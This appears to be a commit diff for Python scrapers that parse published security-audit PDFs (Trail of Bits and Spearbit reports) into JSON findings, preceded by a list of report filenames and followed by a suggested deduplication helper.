+2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf +voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf 
+ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf +2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf +voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf +ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf diff --git a/scrapers/spearbit_parser.py b/scrapers/spearbit_parser.py index 66a370e..67b6738 100644 --- a/scrapers/spearbit_parser.py +++ b/scrapers/spearbit_parser.py @@ -181,13 +181,18 @@ def jsonify_findings(pdf_name): if __name__ == "__main__": # Step 
1: Extract findings text from PDFs - # for pdf_file in os.listdir("../pdfs/spearbit-reports/pdfs"): - # extract_finding(pdf_file) + for pdf_file in os.listdir("../pdfs/spearbit-reports/pdfs"): + try: + extract_finding(pdf_file) + except Exception as e: + print("Error extracting findings from " + pdf_file + ": " + str(e)) # Step 2: Parse findings text into JSON for json_file in os.listdir("../pdfs/spearbit-reports/pdfs"): - jsonify_findings(json_file) - + try: + jsonify_findings(json_file) + except Exception as e: + print("Error parsing findings from " + json_file + ": " + str(e)) # Step 3: deduplicate findings # only keep unique findings, the file contains an array of findings with open("../results/spearbit_findings.json", "r") as f: diff --git a/scrapers/tob_parser.py b/scrapers/tob_parser.py index 29b67fd..552d31a 100644 --- a/scrapers/tob_parser.py +++ b/scrapers/tob_parser.py @@ -6,7 +6,13 @@ def extract_finding(pdf_name): - text = extract_text("../pdfs/" + pdf_name) + + try: + text = extract_text("../pdfs/publications/reviews/" + pdf_name) + except Exception: + with open("errors.txt", "a") as f: + f.write(pdf_name + "\n") + return @@ -65,7 +71,7 @@ def extract_finding(pdf_name): return # Save the findings to a file - with open(f"../findings_newupdate/{pdf_name[:-4]}.txt", "w") as f: + with open(f"../findings_newupdate/tob/{pdf_name[:-4]}.txt", "w") as f: for elem in ordered_findings: if elem == "": continue @@ -74,7 +80,7 @@ def extract_finding(pdf_name): def jsonify_findings(pdf_name): try: - with open(f"../findings_newupdate/{pdf_name[:-4]}.txt", "r") as f: + with open(f"../findings_newupdate/tob/{pdf_name[:-4]}.txt", "r") as f: findings = f.read().splitlines() except FileNotFoundError: return @@ -158,10 +164,13 @@ def jsonify_findings(pdf_name): if __name__ == "__main__": - # for pdf_file in os.listdir("../pdfs"): - # extract_finding(pdf_file) + for pdf_file in os.listdir("../pdfs/publications/reviews"): + try: + extract_finding(pdf_file) + except Exception as e: + print("Error extracting findings from " + pdf_file + ": " + str(e)) - for json_file in os.listdir("../pdfs"): + for json_file in os.listdir("../pdfs/publications/reviews"): jsonify_findings(json_file)
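The dedaub and spearbit scripts above both deduplicate their results file with a list-membership loop (if finding not in unique_findings), which is quadratic in the number of findings, and the trailing comment in tob_parser.py suggests it follows the same pattern. Below is a minimal sketch of how that shared step could be factored into one helper, assuming each results file holds a flat JSON array of finding objects, as the scripts in this diff do. The helper name deduplicate_file is hypothetical, and ../results/tob_findings.json is an assumed path by analogy; only the dedaub and spearbit result paths appear in this diff.

import json

def deduplicate_file(path):
    # Load the findings array produced by one of the parsers above.
    with open(path, "r") as f:
        findings = json.load(f)

    # A dict serialized with sort_keys=True is a stable, hashable key, so
    # duplicates are detected in constant time per finding while the order
    # of first occurrences is preserved.
    seen = set()
    unique = []
    for finding in findings:
        key = json.dumps(finding, sort_keys=True)
        if key not in seen:
            seen.add(key)
            unique.append(finding)

    # Write only the unique findings back, matching the indent=4 style
    # used by the existing scripts.
    with open(path, "w") as f:
        json.dump(unique, f, indent=4)

if __name__ == "__main__":
    # The tob path is an assumed name; the other two are taken from this diff.
    for results in ("../results/tob_findings.json",
                    "../results/spearbit_findings.json",
                    "../results/dedaub_findings.json"):
        deduplicate_file(results)

Beyond replacing the quadratic scan, centralizing the step would keep the three parsers from drifting apart the next time the dedup logic changes.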